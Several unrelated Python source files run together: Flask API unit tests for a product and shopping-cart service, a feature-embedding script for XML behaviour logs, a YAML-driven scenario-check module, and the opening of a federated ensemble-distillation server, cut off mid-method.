                                           and product.price >= test_min_price
                                           and product.price <= test_max_price]
        resp = self.app.get("/api/products",
                            query_string="name={}&description={}&minimum={}&maximum={}".format(
                                test_name, test_description, test_min_price, test_max_price))
        self.assertEqual(resp.status_code, status.HTTP_200_OK)
        data = resp.get_json()
        self.assertEqual(len(data), len(name_description_price_products))
        # check the data just to be sure
        for product in data:
            self.assertEqual(product["name"], test_name)
            self.assertEqual(product["description"], test_description)

    def test_query_product_by_category_description_price(self):
        """ Query Products by Category, Description and Price """
        products = self._create_products(10)
        test_category = products[0].category
        test_description = products[0].description
        test_max_price = products[0].price * 10
        test_min_price = products[0].price / 10
        category_description_price_products = [product for product in products
                                               if product.category == test_category
                                               and product.description == test_description
                                               and product.price >= test_min_price
                                               and product.price <= test_max_price]
        resp = self.app.get("/api/products",
                            query_string="category={}&description={}&minimum={}&maximum={}".format(
                                test_category, test_description, test_min_price, test_max_price))
        self.assertEqual(resp.status_code, status.HTTP_200_OK)
        data = resp.get_json()
        self.assertEqual(len(data), len(category_description_price_products))
        # check the data just to be sure
        for product in data:
            self.assertEqual(product["category"], test_category)
            self.assertEqual(product["description"], test_description)

    def test_query_product_by_name_category_description_price(self):
        """ Query Products by Name, Category, Description and Price """
        products = self._create_products(10)
        test_name = products[0].name
        test_category = products[0].category
        test_description = products[0].description
        test_max_price = products[0].price * 10
        test_min_price = products[0].price / 10
        name_category_description_price_products = [
            product for product in products
            if product.name == test_name
            and product.category == test_category
            and product.description == test_description
            and product.price >= test_min_price
            and product.price <= test_max_price]
        resp = self.app.get("/api/products",
                            query_string="name={}&category={}&description={}&minimum={}&maximum={}".format(
                                test_name, test_category, test_description,
                                test_min_price, test_max_price))
        self.assertEqual(resp.status_code, status.HTTP_200_OK)
        data = resp.get_json()
        self.assertEqual(len(data), len(name_category_description_price_products))
        # check the data just to be sure
        for product in data:
            self.assertEqual(product["name"], test_name)
            self.assertEqual(product["category"], test_category)
            self.assertEqual(product["description"], test_description)

    def test_query_product_by_price_bad_request(self):
        """ Query Products by Invalid Price Range """
        products = self._create_products(10)
        test_max_price = products[0].price * 10
        test_min_price = products[0].price / 10
        # a price-range query needs both bounds; only one of them -> 400
        resp = self.app.get("/api/products",
                            query_string="minimum={}".format(test_min_price))
        self.assertEqual(resp.status_code, status.HTTP_400_BAD_REQUEST)
        resp = self.app.get("/api/products",
                            query_string="maximum={}".format(test_max_price))
        self.assertEqual(resp.status_code, status.HTTP_400_BAD_REQUEST)

    def test_purchase_product_shopcart_exists(self):
        '''Purchase a Product Shopcart Exists Successfully'''
        user_id = 101
        # mock the shopcart service: GET finds an existing shopcart for the user
        with patch('requests.get') as get_shopcart_by_userid_mock:
            get_shopcart_by_userid_mock.return_value.status_code = 200
            get_shopcart_by_userid_mock.return_value.json.return_value = [{"create_time": "2020-11-15T19:36:28.302839","id": 6,"update_time": "2020-11-15T19:36:28.302839","user_id": 101}]
            with patch('service.service.add_item_to_shopcart') as post_shopcart_item_mock:
                post_shopcart_item_mock.return_value.status_code = 201
                json = {"user_id": user_id, "amount": 4}
                product = self._create_products(1)
                resp = self.app.post("/api/products/{}/purchase".format(product[0].id),
                                     json=json,
                                     content_type="application/json")
                self.assertEqual(resp.status_code, status.HTTP_200_OK)
                self.assertEqual(resp.data, b'{"message":"Product successfully added into the shopping cart"}\n')

    def test_purchase_product_shopcart_no_exist(self):
        '''Purchase a Product Shopcart Doesn't Exist Successfully'''
        user_id = 101
        # mock: no shopcart for the user, so one is created before adding the item
        with patch('requests.get') as get_shopcart_by_userid_mock:
            get_shopcart_by_userid_mock.return_value.status_code = 200
            get_shopcart_by_userid_mock.return_value.json.return_value = []
            with patch('service.service.create_shopcart') as create_shopcart_mock:
                create_shopcart_mock.return_value.status_code = 201
                with patch('service.service.add_item_to_shopcart') as post_shopcartitem_mock:
                    post_shopcartitem_mock.return_value.status_code = 201
                    json = {"user_id": user_id, "amount": 4}
                    product = self._create_products(1)
                    resp = self.app.post("/api/products/{}/purchase".format(product[0].id),
                                         json=json,
                                         content_type="application/json")
                    self.assertEqual(resp.status_code, status.HTTP_200_OK)
                    self.assertEqual(resp.data, b'{"message":"Product successfully added into the shopping cart"}\n')

    def test_purchase_product_not_found(self):
        '''Purchase a Product That's Not Found'''
        user_id = 101
        with patch('requests.get') as get_shopcart_by_userid_mock:
            get_shopcart_by_userid_mock.return_value.status_code = 200
            get_shopcart_by_userid_mock.return_value.json.return_value = [{"create_time": "2020-11-15T19:36:28.302839","id": 6,"update_time": "2020-11-15T19:36:28.302839","user_id": 101}]
            with patch('service.service.add_item_to_shopcart') as post_shopcart_item_mock:
                post_shopcart_item_mock.return_value.status_code = 201
                json = {"user_id": user_id, "amount": 4}
                # no product was created, so id 1 does not exist -> 404
                resp = self.app.post("/api/products/1/purchase",
                                     json=json,
                                     content_type="application/json")
                self.assertEqual(resp.status_code, status.HTTP_404_NOT_FOUND)

    def test_purchase_product_cannot_add_shopcart(self):
        '''Purchase a Product Not Added Into Shopcart (Shopcart Exists) '''
        user_id = 101
        with patch('requests.get') as get_shopcart_by_userid_mock:
            get_shopcart_by_userid_mock.return_value.status_code = 200
            get_shopcart_by_userid_mock.return_value.json.return_value = [{"create_time": "2020-11-15T19:36:28.302839","id": 6,"update_time": "2020-11-15T19:36:28.302839","user_id": 101}]
            with patch('service.service.add_item_to_shopcart') as post_shopcart_item_mock:
                # adding the item to the shopcart fails
                post_shopcart_item_mock.return_value.status_code = 400
                json = {"user_id": user_id, "amount": 4}
                product = self._create_products(1)
                resp = self.app.post("/api/products/{}/purchase".format(product[0].id),
                                     json=json,
                                     content_type="application/json")
                self.assertEqual(resp.status_code, status.HTTP_404_NOT_FOUND)
                self.assertEqual(resp.data, b'{"message": "Product was not added in the shopping cart because of an error"}\n')

    def test_purchase_product_empty_user_id(self):
        '''Purchase a Product Empty User ID'''
        user_id = ""
        with patch('requests.get') as get_shopcart_by_userid_mock:
            get_shopcart_by_userid_mock.return_value.status_code = 200
            get_shopcart_by_userid_mock.return_value.json.return_value = [{"create_time": "2020-11-15T19:36:28.302839","id": 6,"update_time": "2020-11-15T19:36:28.302839","user_id": 101}]
            with patch('service.service.add_item_to_shopcart') as post_shopcart_item_mock:
                post_shopcart_item_mock.return_value.status_code = 201
                json = {"user_id": user_id, "amount": 4}
                product = self._create_products(1)
                resp = self.app.post("/api/products/{}/purchase".format(product[0].id),
                                     json=json,
                                     content_type="application/json")
                self.assertEqual(resp.status_code, status.HTTP_400_BAD_REQUEST)
                self.assertEqual(resp.data, b'{"message": "Fields cannot be empty"}\n')

    def test_purchase_product_empty_amount(self):
        '''Purchase a Product Empty Amount '''
        user_id = 101
        with patch('requests.get') as get_shopcart_by_userid_mock:
            get_shopcart_by_userid_mock.return_value.status_code = 200
            get_shopcart_by_userid_mock.return_value.json.return_value = [{"create_time": "2020-11-15T19:36:28.302839","id": 6,"update_time": "2020-11-15T19:36:28.302839","user_id": 101}]
            with patch('service.service.add_item_to_shopcart') as post_shopcart_item_mock:
                post_shopcart_item_mock.return_value.status_code = 201
                json = {"user_id": user_id, "amount": ""}
                product = self._create_products(1)
                resp = self.app.post("/api/products/{}/purchase".format(product[0].id),
                                     json=json,
                                     content_type="application/json")
                self.assertEqual(resp.status_code, status.HTTP_400_BAD_REQUEST)
                self.assertEqual(resp.data, b'{"message": "Fields cannot be empty"}\n')

    def test_purchase_product_id_not_int(self):
        '''Purchase a Product ID not Int '''
        user_id = 101
        with patch('requests.get') as get_shopcart_by_userid_mock:
            get_shopcart_by_userid_mock.return_value.status_code = 200
            get_shopcart_by_userid_mock.return_value.json.return_value = [{"create_time": "2020-11-15T19:36:28.302839","id": 6,"update_time": "2020-11-15T19:36:28.302839","user_id": 101}]
            with patch('service.service.add_item_to_shopcart') as post_shopcart_item_mock:
                post_shopcart_item_mock.return_value.status_code = 201
                json = {"user_id": user_id, "amount": 4}
                resp = self.app.post("/api/products/{}/purchase".format("test"),
                                     json=json,
                                     content_type="application/json")
                self.assertEqual(resp.status_code, status.HTTP_400_BAD_REQUEST)
                self.assertEqual(resp.data, b'{"message": "Invalid Product ID. Must be Integer"}\n')

    def test_purchase_amount_not_int(self):
        '''Purchase a Product Amount not Int '''
        user_id = 101
        with patch('requests.get') as get_shopcart_by_userid_mock:
            get_shopcart_by_userid_mock.return_value.status_code = 200
            get_shopcart_by_userid_mock.return_value.json.return_value = [{"create_time": "2020-11-15T19:36:28.302839","id": 6,"update_time": "2020-11-15T19:36:28.302839","user_id": 101}]
            with patch('service.service.add_item_to_shopcart') as post_shopcart_item_mock:
                post_shopcart_item_mock.return_value.status_code = 201
                json = {"user_id": user_id, "amount": "hello"}
                product = self._create_products(1)
                resp = self.app.post("/api/products/{}/purchase".format(product[0].id),
                                     json=json,
                                     content_type="application/json")
                self.assertEqual(resp.status_code, status.HTTP_400_BAD_REQUEST)
                self.assertEqual(resp.data, b'{"message": "Invalid Amount. Must be Integer"}\n')

    def test_purchase_user_id_not_int(self):
        '''Purchase a Product User ID not Int '''
        user_id = "testing"
        with patch('requests.get') as get_shopcart_by_userid_mock:
            get_shopcart_by_userid_mock.return_value.status_code = 200
            get_shopcart_by_userid_mock.return_value.json.return_value = [{"create_time": "2020-11-15T19:36:28.302839","id": 6,"update_time": "2020-11-15T19:36:28.302839","user_id": 101}]
            with patch('service.service.add_item_to_shopcart') as post_shopcart_item_mock:
                post_shopcart_item_mock.return_value.status_code = 201
                json = {"user_id": user_id, "amount": 4}
                product = self._create_products(1)
                resp = self.app.post("/api/products/{}/purchase".format(product[0].id),
                                     json=json,
                                     content_type="application/json")
                self.assertEqual(resp.status_code, status.HTTP_400_BAD_REQUEST)
                self.assertEqual(resp.data, b'{"message": "Invalid User ID. Must be Integer"}\n')

    def test_purchase_unsuccessful_product_shopcart_error(self):
        '''Purchase a Product Shopcart Doesn't Exist (ShopCart Creation Error)'''
        user_id = 101
        with patch('requests.get') as get_shopcart_by_userid_mock:
            get_shopcart_by_userid_mock.return_value.status_code = 200
            get_shopcart_by_userid_mock.return_value.json.return_value = []
            with patch('service.service.create_shopcart') as create_shopcart_mock:
                # shopcart creation fails -> purchase is rejected
                create_shopcart_mock.return_value.status_code = 400
                json = {"user_id": user_id, "amount": 4}
                product = self._create_products(1)
                resp = self.app.post("/api/products/{}/purchase".format(product[0].id),
                                     json=json,
                                     content_type="application/json")
                self.assertEqual(resp.status_code, status.HTTP_400_BAD_REQUEST)
                self.assertEqual(resp.data, b'{"message": "Cannot create shopcart so cannot add product into shopping cart"}\n')

    def test_purchase_product_shopcart_unsuccessful_product(self):
        '''Purchase a Product (Product Adding Error) '''
        user_id = 101
        with patch('requests.get') as get_shopcart_by_userid_mock:
            get_shopcart_by_userid_mock.return_value.status_code = 200
            get_shopcart_by_userid_mock.return_value.json.return_value = []
            with patch('service.service.create_shopcart') as create_shopcart_mock:
                create_shopcart_mock.return_value.status_code = 201
                with patch('service.service.add_item_to_shopcart') as post_shopcartitem_mock:
                    # shopcart is created but adding the item fails
                    post_shopcartitem_mock.return_value.status_code = 400
                    json = {"user_id": user_id, "amount": 4}
                    product = self._create_products(1)
                    resp = self.app.post("/api/products/{}/purchase".format(product[0].id),
                                         json=json,
                                         content_type="application/json")
                    self.assertEqual(resp.status_code, status.HTTP_400_BAD_REQUEST)
                    self.assertEqual(resp.data, b'{"message": "Product not successfully added into the shopping cart"}\n')

    def test_data_validation_error(self):
        '''Data Validation Error '''
        test_product = ProductFactory()
        data = test_product.serialize()
        # drop the mandatory 'name' field to trigger validation failure
        data.pop('name', None)
        resp = self.app.post(
            "/api/products",
            json=data,
            content_type="application/json"
        )
        self.assertEqual(resp.status_code, status.HTTP_400_BAD_REQUEST)
        self.assertIn(b'Bad Request', resp.data)

    def test_404_not_found_error(self):
        '''Resources Not Found Error '''
        # literal "{}" (and missing /api prefix) is an unroutable path
        resp = self.app.get("/products/{}")
        self.assertEqual(resp.status_code, status.HTTP_404_NOT_FOUND)
        self.assertIn(b'Not Found', resp.data)

    def test_method_not_allowed_error(self):
        '''Test Method Not Allowed Error '''
        resp = self.app.post("/")
        self.assertEqual(resp.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
        self.assertIn(b'Method not Allowed', resp.data)

    def test_unsupported_media_type_error(self):
        '''Unsupported Media Requests '''
        test_product = ProductFactory()
        resp = self.app.post(
            "/api/products",
            json=test_product.serialize(),
            content_type="text/javascript"
        )
        self.assertEqual(resp.status_code, status.HTTP_415_UNSUPPORTED_MEDIA_TYPE)
        self.assertIn(b'{"message": "Content-Type must be application/json"}\n', resp.data)

    def test_internal_server_error(self):
        '''Internal Server Error '''
        # call the error handler directly; it returns a (body, status) tuple
        resp = internal_server_error("internal serval error")
        self.assertEqual(resp[1], status.HTTP_500_INTERNAL_SERVER_ERROR)
# <reponame>LPirch/tagvet
import re
import argparse
import pickle
import xml.etree.ElementTree as ET
from collections import Counter

from tqdm import tqdm
import joblib

from features import get_ref_hashes, _filter_xml_iter, get_tokens
from build_vocab import load_yaml

RE_DELIM = re.compile(r'(\W+)')

# Reserved embedding dimensions (vocabulary dims start above these).
PAD_DIM = 1          # padding
PLACEHOLDER_DIM = 2  # out-of-vocabulary placeholder ('*')


def parse_args():
    """Parse command line arguments and return them as a dict."""
    parser = argparse.ArgumentParser()
    parser.add_argument('data_zip', help='zip file with glog data')
    parser.add_argument('label_file', help='label file (csv)')
    parser.add_argument('vocab_file', help='token vocab (pickle)')
    parser.add_argument('feat_file', help='raw feature file (pickle)')
    parser.add_argument('vocab_out', help='output (word-level) vocab (pkl)')
    parser.add_argument('--config_file', default='extraction_conf.yml',
                        help='name of the config file')
    parser.add_argument('--jobs', type=int, default=1,
                        help='number of parallel processes')
    parser.add_argument('--min_df', type=int, default=1,
                        help='minimum absolute document frequency')
    args = parser.parse_args()
    return vars(args)


def extract_features(zip_name, ref_hashes, vocab, feat_file, vocab_out,
                     jobs, min_df, **extraction_kwargs):
    """
    Extract features from zipped glogs, construct vocabulary, embed features
    and save the feature matrix and vocabulary.

    NOTE: This uses a second vocabulary on the word level (combined tokens
    with delimiters like paths etc.) as opposed to the provided vocabulary
    on token level!

    @param zip_name: zip file with glog reports
    @param ref_hashes: reference list of hashes (for ordering)
    @param vocab: vocabulary dict
    @param feat_file: output file for feature matrix
    @param vocab_out: output file for new (filtered) vocab
    @param jobs: number of parallel processes
    @param min_df: minimum document frequency
    @param extraction_kwargs: additional extraction keyword/value arguments
    """
    print('[-] extract filtered raw data')
    with joblib.parallel_backend('loky'):
        X_raw = joblib.Parallel(n_jobs=jobs)(joblib.delayed(
            get_tokens)(zip_name, [ref_h], get_filtered, verbose=False,
                        vocab=vocab, **extraction_kwargs)
            for ref_h in tqdm(ref_hashes))

    # analyze df
    print('[-] analyzing glogs')
    with joblib.parallel_backend('loky'):
        doc_freqs = joblib.Parallel(n_jobs=jobs)(joblib.delayed(
            count_df)(glog,) for glog in tqdm(doc for doc in X_raw))
    # merge per-document counters incrementally; sum(..., Counter()) would
    # rebuild the accumulator on every addition (quadratic in #documents)
    df = Counter()
    for doc_counter in doc_freqs:
        df.update(doc_counter)

    # build new vocab: dims 1 and 2 are reserved for PAD and placeholder,
    # real tokens start at len(vocab) + 1 == 3
    vocab = {'PAD': PAD_DIM, '*': PLACEHOLDER_DIM}
    max_row_len = 0
    print('[-] build new vocab')
    for glog in tqdm(X_raw):
        glog_tokens = set()
        for row in glog:
            glog_tokens |= set(row)
            max_row_len = max(len(row), max_row_len)
        for token in glog_tokens:
            # keep only tokens that appear in at least min_df documents
            if token not in vocab and df[token] >= min_df:
                vocab[token] = len(vocab) + 1
    print("[-] finished. vocab size: ", len(vocab))

    # embed
    print('[-] embedding dataset')
    with joblib.parallel_backend('loky'):
        X_emb = joblib.Parallel(n_jobs=jobs)(joblib.delayed(
            embed_single)(glog, vocab, max_row_len) for glog in tqdm(X_raw))

    # save
    with open(feat_file, 'wb') as pkl:
        pickle.dump(X_emb, pkl)
    with open(vocab_out, 'wb') as pkl:
        pickle.dump(vocab, pkl)


def get_filtered(glog, vocab=None, ignored_nodes=None, ignored_attribs=None):
    """
    Retrieve filtered tokens from glog contents (as string).

    Yields one token list per XML node that survives the node/attrib filter.
    """
    xml = ET.fromstring(glog)
    for node in _filter_xml_iter(xml, ignored_nodes, ignored_attribs):
        yield _serialize_vocab(node, vocab)


def _serialize_vocab(node, vocab):
    """
    Replace rare substrings by '*' and merge them again using the original
    delimiter.

    @param node: xml node (glog function call)
    @param vocab: dictionary mapping tokens to dimensions
    @return: list of word-level tokens for the node
    """
    tokens = []
    tag = node.tag
    if node.tag not in vocab:
        tag = '*'
    tokens.append(tag)
    for k, v in node.attrib.items():
        v = v.lower()
        if k not in vocab:
            k = '*'
        tokens.append(k)
        # split the value into alternating word/delimiter pieces
        split_v = RE_DELIM.split(v)
        delims = []
        vals = []
        for sp_val in split_v:
            if RE_DELIM.match(sp_val):
                delims.append(sp_val)
            else:
                vals.append(sp_val)
        # add one delim at the end for equally-sized lists
        delims.append('')
        vals = [v if v in vocab else '*' for v in vals]
        # merge with delimiters
        merged_vals = []
        for val, delim in zip(vals, delims):
            merged_vals.append(val)
            merged_vals.append(delim)
        tokens.append(''.join(merged_vals))
    return tokens


def count_df(glog):
    """
    Count document frequencies.

    Each distinct token contributes exactly one count per document.

    @param glog: iterable of token lists (one glog document)
    @return: Counter mapping token -> 1 for every token in this document
    """
    glog_tokens = set()
    for tokens in glog:
        glog_tokens |= set(tokens)
    # Counter over a set yields count 1 per element -- equivalent to the
    # manual "if token not in df: df[token] = 1" loop, in one C-level pass
    return Counter(glog_tokens)


def embed_single(glog, vocab, max_row_len):
    """
    Embed glog tokens according to a vocabulary, padding to max_row_len.

    @param glog: list of extracted tokens (after _serialize_vocab)
    @param vocab: dictionary mapping each token to a dimension
    @param max_row_len: maximum number of function call arguments (determined
        by analyzing the dataset and used to pad all rows to the same length)
    @return: list of equal-length integer rows
    """
    glog_rows = []
    for row in glog:
        # unknown tokens map to the placeholder dimension
        emb_row = [vocab.get(token, PLACEHOLDER_DIM) for token in row]
        emb_row += [PAD_DIM] * (max_row_len - len(emb_row))
        glog_rows.append(emb_row)
    return glog_rows


def main(data_zip, label_file, vocab_file, feat_file, vocab_out, jobs,
         config_file, min_df):
    """
    Embed features according to a given vocabulary and save them in a pickle
    file.

    @param data_zip: zip file with glog data
    @param label_file: label file (csv)
    @param vocab_file: token vocab (pickle)
    @param feat_file: raw feature file (pickle)
    @param vocab_out: output (word-level) vocab (pkl)
    @param jobs: number of parallel processes
    @param config_file: name of the config file
    @param min_df: minimum absolute document frequency
    """
    cnf = load_yaml(config_file)
    ref_hashes = get_ref_hashes(label_file)
    # use a context manager so the vocab file handle is closed deterministically
    with open(vocab_file, 'rb') as fh:
        vocab = pickle.load(fh)
    extract_features(data_zip, ref_hashes, vocab, feat_file, vocab_out,
                     jobs, min_df, **cnf)


if __name__ == '__main__':
    args = parse_args()
    main(**args)
from datetime import (
    datetime,
    timedelta,
)

from core import constants
from core.issues import issue_utils
from core.searchtools import (
    FileSearcher,
    SearchDef,
)
from core.log import log
from core.ycheck import (
    YDefsLoader,
    YDefsSection,
    AutoChecksBase,
    YAMLDefInput,
    YAMLDefExpr,
    YAMLDefRequires,
)


class YAMLDefScenarioCheck(YAMLDefExpr, YAMLDefRequires, YAMLDefInput):
    """
    Override grouping used by scenario checks. Adds an additional 'meta'
    override that can be used to provide metadata to the check
    implementation.
    """
    # Copy (do not alias) the parent KEYS lists before extending them.
    KEYS = [] + YAMLDefExpr.KEYS + YAMLDefRequires.KEYS + YAMLDefInput.KEYS
    KEYS.append('meta')

    def __getattr__(self, name):
        # 'meta' sections are free-form dictionaries; everything else is
        # resolved by the standard override machinery.
        if self._override_name == 'meta':
            return self.content.get(name)
        else:
            return super().__getattr__(name)


class ScenarioCheckMeta(object):
    """Accessor for the optional 'meta' override of a scenario check."""

    def __init__(self, meta):
        self._meta = meta or {}

    @property
    def period(self):
        """
        If min is provided this is used to determine the period within which
        min applies. If period is unset, the period is infinite i.e. across
        all available data.

        Supported values:
          <int> hours
        """
        return self._meta.period

    @property
    def min(self):
        """
        Minimum search matches required for result to be True (default is 1)
        """
        return int(self._meta.min or 1)


class ScenarioCheck(object):
    """ See YAMLDefScenarioCheck for overrides used with this class.

    A scenario is defined as requiring one (and only one) of the following:
      * a search expression to match against an input (file or command).
      * a property to match a given value

    See ScenarioCheckMeta for optional metadata.
    """

    def __init__(self, name, input=None, expr=None, meta=None, requires=None):
        self.name = name
        self.input = input
        self.expr = expr
        self.meta = ScenarioCheckMeta(meta)
        self.requires = requires

    @classmethod
    def get_datetime_from_result(cls, result):
        """Build a datetime from the first two groups (date, time) of a
        search result."""
        ts = "{} {}".format(result.get(1), result.get(2))
        return datetime.strptime(ts, "%Y-%m-%d %H:%M:%S.%f")

    @classmethod
    def filter_by_period(cls, results, period, min_results):
        """
        Return a subset of results that all fall within a window of
        `period` hours, or [] if no such window contains at least
        `min_results` results.

        @param results: search results whose groups 1 and 2 hold date/time
        @param period: window size in hours
        @param min_results: minimum number of results required
        """
        _results = []
        for r in results:
            ts = cls.get_datetime_from_result(r)
            _results.append((ts, r))

        results = []
        last = None
        prev = None
        count = 0
        # Walk newest-to-oldest, sliding the window start back whenever a
        # result falls outside the current window.
        for r in sorted(_results, key=lambda i: i[0], reverse=True):
            if last is None:
                last = r[0]
            elif r[0] < last - timedelta(hours=period):
                last = prev
                prev = None
                # pop first element since it is now invalidated
                count -= 1
                results = results[1:]
            elif prev is None:
                prev = r[0]

            results.append(r)
            count += 1
            if count >= min_results:
                # we already have enough results so return
                break

        if len(results) < min_results:
            return []

        return [r[1] for r in results]

    @property
    def result(self):
        """Evaluate the check and return True/False."""
        if self.expr:
            s = FileSearcher()
            s.add_search_term(SearchDef(self.expr.value, tag='all'),
                              self.input.path)
            results = s.search()
            if not results:
                log.debug("scenario check %s: False", self.name)
                return False

            results = results.find_by_tag('all')
            # NOTE: meta.min defaults to 1 so this branch is always taken.
            if self.meta.min:
                if self.meta.period:
                    count = len(self.filter_by_period(results,
                                                      self.meta.period,
                                                      self.meta.min))
                else:
                    count = len(results)

                if count >= self.meta.min:
                    return True
                else:
                    log.debug("scenario check %s: not enough matches (%s) to "
                              "satisfy min of %s", self.name, count,
                              self.meta.min)
                    return False
            else:
                return len(results) > 0
        elif self.requires:
            return self.requires.passes
        else:
            raise Exception("unknown scenario check type")


class ScenarioConclusions(object):
    """A conclusion reached by combining the results of scenario checks."""

    def __init__(self, priority, decision=None, raises=None, checks=None):
        self.priority = priority
        self.decision = decision
        self.raises = raises
        self.checks = checks
        self.issue_message = None
        self.issue_type = None

    def get_check_result(self, name):
        """Return the result of check `name`, or None if unknown."""
        result = None
        if name in self.checks:
            result = self.checks[name].result
        return result

    def _run_conclusion(self):
        # A singleton decision names a single check; otherwise combine
        # check results with the given boolean operator.
        if self.decision.is_singleton:
            return self.get_check_result(self.decision.content)
        else:
            for _bool, checks in self.decision:
                results = [self.get_check_result(c) for c in checks]
                if _bool == 'and':
                    return all(results)
                elif _bool == 'or':
                    return any(results)
                else:
                    # typo fix: was "decsion"
                    log.debug("unsupported boolean decision '%s'", _bool)
                    return False

    @property
    def reached(self):
        """ Return true if a conclusion has been reached. """
        result = self._run_conclusion()
        # Message/type are prepared unconditionally so callers can read
        # them immediately after a True result.
        fdict = self.raises.format_dict or {}
        self.issue_message = str(self.raises.message).format(**fdict)
        self.issue_type = self.raises.type
        return result


class Scenario(object):
    """A named set of checks plus the conclusions drawn from them."""

    def __init__(self, name, checks, conclusions):
        self.name = name
        self._checks = checks
        self._conclusions = conclusions

    @property
    def checks(self):
        """Build a dict of check name -> ScenarioCheck from the yaml defs."""
        section = YDefsSection('checks', self._checks.content,
                               checks_handler=self)
        _checks = {}
        for c in section.leaf_sections:
            _checks[c.name] = ScenarioCheck(c.name, c.input, c.expr, c.meta,
                                            c.requires)
        return _checks

    @property
    def conclusions(self):
        """Build a dict of conclusion name -> ScenarioConclusions."""
        section = YDefsSection('conclusions', self._conclusions.content,
                               checks_handler=self)
        _conclusions = {}
        for r in section.leaf_sections:
            priority = r.priority or 1
            _conclusions[r.name] = ScenarioConclusions(int(priority),
                                                       r.decision, r.raises,
                                                       self.checks)
        return _conclusions


class YScenarioChecker(AutoChecksBase):
    """Load and run all scenario definitions for the current plugin."""

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self._scenarios = []

    def load(self):
        """Load scenario yaml defs, skipping scenarios whose requirements
        are not met."""
        plugin_content = YDefsLoader('scenarios').load_plugin_defs()
        if not plugin_content:
            return

        yscenarios = YDefsSection(constants.PLUGIN_NAME, plugin_content,
                                  extra_overrides=[YAMLDefScenarioCheck],
                                  checks_handler=self)
        log.debug("sections=%s, scenarios=%s",
                  len(yscenarios.branch_sections),
                  len(yscenarios.leaf_sections))
        if yscenarios.requires and not yscenarios.requires.passes:
            log.debug("plugin not runnable - skipping scenario checks")
            return

        for scenario in yscenarios.leaf_sections:
            if scenario.requires:
                requires_passes = scenario.requires.passes
            else:
                requires_passes = True

            if requires_passes:
                self._scenarios.append(Scenario(scenario.name,
                                                scenario.checks,
                                                scenario.conclusions))

    @property
    def scenarios(self):
        return self._scenarios

    def run(self):
        """Evaluate every scenario and raise an issue for the highest
        priority conclusion reached (if any)."""
        for scenario in self.scenarios:
            result = None
            log.debug("running scenario: %s", scenario.name)
            # run all conclusions and use highest priority result
            for name, conc in scenario.conclusions.items():
                if conc.reached:
                    if not result:
                        result = conc
                    elif conc.priority > result.priority:
                        result = conc

                    log.debug("conclusion is: %s (priority=%s)", name,
                              result.priority)

            if result:
                issue_utils.add_issue(result.issue_type(result.issue_message))
            else:
                # typo fix: was "conlusion"
                log.debug("no conclusion reached")
from .server_base import ServerBase
import copy
import torch.optim as optim
import torch.nn.functional as F
import torch
import torch.nn as nn
from torch.utils.data import DataLoader
from ..models.models import create_model
from ..datasets.dataset_student import StudentData
import numpy as np
import sys


class FedEdServer(ServerBase):
    """ Class defining server for federated ensemble distillation.

    Clients are trained locally, their softmax outputs on a public dataset
    are combined with one of several weighting schemes, and a student model
    is distilled from the weighted ensemble.
    """

    def __init__(self, args, model, run_folder, train_loaders, test_loader, public_loader) -> None:
        super().__init__(args, model, run_folder, train_loaders, test_loader, public_loader)
        self.student_models = [student for student in args.student_models.split(' ')]
        self.logits_local = None
        self.local_epochs_ensemble = args.local_epochs_ensemble
        self.student_batch_size = args.student_batch_size
        self.public_batch_size = args.public_batch_size
        self.student_epochs = args.student_epochs
        self.student_epochs_w2 = args.student_epochs_w2
        self.public_data_sizes = [int(x) for x in args.public_data_sizes.split(' ')]
        self.weight_schemes_list = [int(x) for x in args.weight_schemes.split(' ')]
        self.weight_scheme = self.weight_schemes_list[0]
        self.client_sample_fraction = args.client_sample_fraction
        # Per-client autoencoder-based sample weights (scheme 2 only).
        self.ae_public_weights = []
        self.ae_test_weights = []
        self.autoencoder_epochs = args.autoencoder_epochs
        self.student_lr = args.student_lr
        self.student_lr_w2 = args.student_lr_w2
        self.student_loss = args.student_loss

    def run(self):
        """ Execute federated training and distillation.

        Trains every client locally, collects their logits on the public
        and test sets, reports ensemble accuracy per weighting scheme, and
        finally distills one student model per (scheme, loss, architecture,
        public-dataset-size) combination.
        """
        ensemble_public_logits, ensemble_test_logits = [], []
        local_accs, local_losses = [], []
        for j in range(self.n_clients):
            print("-- Training client nr {} --".format(j+1))
            accs, losses = self._local_training(j)
            local_accs.extend([accs])
            local_losses.extend([losses])
            self._save_results(local_accs, "client_accuracy")
            self._save_results(local_losses, "client_loss")
            local_public_logits, local_test_logits = self._get_local_logits()
            if 2 in self.weight_schemes_list:
                # Scheme 2 needs per-sample autoencoder reconstruction
                # weights for every client.
                public_weights, test_weights = self._get_autoencoder_weights(client_nr=j)
                self.ae_public_weights.append(public_weights)
                self.ae_test_weights.append(test_weights)
            ensemble_public_logits.append(local_public_logits)
            ensemble_test_logits.append(local_test_logits)

        for scheme in self.weight_schemes_list:
            self.weight_scheme = scheme
            ensemble_test_acc = self._ensemble_accuracy(ensemble_test_logits)
            print("Ensemble-w{} test accuracy: {:.0f}%".format(scheme, ensemble_test_acc))
            self._save_results([ensemble_test_acc], f"w{scheme}_ensemble_test_acc")
            print("")

        losses = ["ce"]
        for scheme in self.weight_schemes_list:
            self.weight_scheme = scheme
            if scheme == 2:
                # Scheme 2 uses its own distillation hyperparameters.
                self.student_epochs = self.student_epochs_w2
                self.student_lr = self.student_lr_w2
            for loss in losses:
                self.student_loss = loss
                for student_model in self.student_models:
                    print(f"|| Training student model: {student_model}. Weight scheme: {scheme}. Loss: {loss} ||")
                    for public_size in self.public_data_sizes:
                        print(f"Public dataset size: {public_size}")
                        student_loader, public_train_loader, public_val_loader = self._get_student_data_loaders(public_size, ensemble_public_logits)
                        train_accs, train_losses, val_accs, val_losses = self._train_student(student_model, ensemble_public_logits, student_loader, public_train_loader, public_val_loader, public_size)
                        test_acc, test_loss = self.evaluate(self.global_model, self.test_loader)
                        self._save_results([train_accs, train_losses, val_accs, val_losses], f"w{scheme}_student_{student_model}_{loss}_train_results_{public_size}")
                        self._save_results([test_acc, test_loss], f"w{scheme}_student_{student_model}_{loss}_test_results_{public_size}")
                        print('\nStudent Model Test: Avg. loss: {:.4f}, Accuracy: {:.0f}%\n'.format(
                            test_loss, test_acc))

    def _local_training(self, client_nr):
        """ Complete local training at client.

        Parameters:
        client_nr (int): ID for the client to do local training at.

        Returns:
        (list, list): per-epoch train accuracies and losses.
        """
        self.local_model = copy.deepcopy(self.global_model).to(self.device)
        self.local_model.train()
        optimizer = optim.SGD(self.local_model.parameters(), lr=self.lr_rate, momentum=self.momentum)
